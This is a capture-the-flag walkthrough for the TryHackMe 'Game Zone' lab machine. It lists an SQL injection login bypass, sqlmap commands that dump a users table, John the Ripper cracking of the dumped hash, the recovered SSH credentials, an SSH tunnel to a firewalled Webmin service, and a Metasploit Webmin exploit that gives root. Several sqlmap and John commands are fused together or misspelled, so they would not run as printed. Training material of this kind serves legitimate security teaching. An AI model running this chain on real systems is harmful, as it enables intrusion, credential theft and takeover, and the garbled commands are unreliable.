TryHackMe — Game Zone
[Task 1] Deploy the vulnerable machine
#1 Deploy the machine and access its web server.
#2 What is the name of the large cartoon avatar holding a sniper on the forum?
agent 47
[Task 2] Obtain access via SQLi
#1 SQL is a standard language for storing, editing and retrieving data in databases.
#2 Lets use what we’ve learnt above, to manipulate the query and login without any legitimate credentials.
Log in : ' or 1=1 #
#3 GameZone doesn’t have an admin user in the database, however you can still login without knowing any credentials using the inputted password data we used in the previous question.
http://10.10.73.54/portal.php
When you’ve logged in, what page do you get redirected to?
portal.php
[Task 3] Using SQLMap
#1 We’re going to use SQLMap to dump the entire database for GameZone.
sqlmap -u "http://10.10.73.54/portal.php" --data="searchitem=cyberops" --dbs
sqlmap -u "http://10.10.73.54/portal.php" --data="searchitem=cyberops" -D db --tablessqlmap -u "http://10.10.73.54/portal.php" --data="searchitem=cyberops" -D db -T users --culumnssqlmap -u "http://10.10.73.54/portal.php" --data="searchitem=cyberops" -D db -T users -C username,pwd --dump
In the users table, what is the hashed password?
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
#2 What was the username associated with the hashed password?
agent47
#3 What was the other table name?
post
[Task 4] Cracking a password with JohnTheRipper
#2 What is the de-hashed password?
echo "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14" > pwdjohn pwd --format=Raw-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt
videogamer124
#3 Now you have a password and username. Try SSH’ing onto the machine.
ssh agent47@10.10.73.54
What is the user flag?
cat /home/agent47/user.txt
[Task 5] Exposing services with reverse SSH tunnels
#1 How any TCP sockets are running?
ss -tulpn
5
#2 We can see that a service running on port 10000 is blocked via a firewall rule from the outside (we can see this from the IPtable list). However, Using an SSH Tunnel we can expose the port to us (locally)!
ssh -L 10000:localhost:10000 agent47@10.10.73.54
http://localhost:10000/
User : agent47
Pass : videogamer124
What is the name of the exposed CMS?
webmin
#3 What is the CMS version?
1.580
[Task 6] Privilege Escalation with Metasploit
msfconsole
use exploit/unix/webapp/webmin_show_cgi_exec
set RHOSTS localhost
set USERNAME agent47
set PASSWORD videogamer124
set SSL false
exploit
python -c ‘import pty; pty.spawn(“/bin/bash”)’
#1 What is the root flag?
cat /root/root.txt